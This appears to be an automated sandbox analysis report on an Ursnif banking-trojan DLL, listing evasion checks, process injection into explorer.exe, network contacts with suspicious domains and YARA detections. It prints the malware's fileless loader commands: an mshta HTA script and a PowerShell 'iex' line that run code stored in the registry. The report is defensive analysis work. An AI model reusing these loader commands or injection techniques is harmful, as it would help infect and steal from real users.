                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3376 Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332 Thread sleep count: 3419 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332 Thread sleep count: 5432 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6320 Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ebytp2em.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uio4qdnj.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hjljqxud.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3911
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5235
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3419
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5432
                      Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B6B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B66467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B5BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0334BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03356467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0335B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B52E19 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000027.00000000.735751989.00000000047D0000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATA
                      Source: explorer.exe, 00000027.00000000.719678172.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                      Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                      Source: RuntimeBroker.exe, 00000031.00000000.776047119.000001B91D040000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000027.00000000.726075838.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                      Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A1DE5 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B576B3 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_033476B3 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.97.178.98 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.29.104.83 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.101.9.178 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.97.160.2 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: xereunrtol.website
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: zereunrtol.website
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
                      Writes to foreign memory regions
                      Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 93C000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: AD0000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 940000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: D80000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A20574000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
                      Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFC8DCB1580 protect: page execute read
                      Allocates memory in foreign processes
                      Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 93C000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: AD0000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 940000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: D80000 value: 80
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3352
                      Source: C:\Windows\explorer.exe Thread register set: target process: 4084
                      Source: C:\Windows\explorer.exe Thread register set: target process: 4176
                      Source: C:\Windows\explorer.exe Thread register set: target process: 4440
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
                      Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
                      Source: C:\Windows\explorer.exe Thread created: unknown EIP: 8DCB1580
                      Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
                      Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 00000027.00000000.717923899.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
                      Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000027.00000000.719678172.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B0A82B cpuid
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B53E33 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B0A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
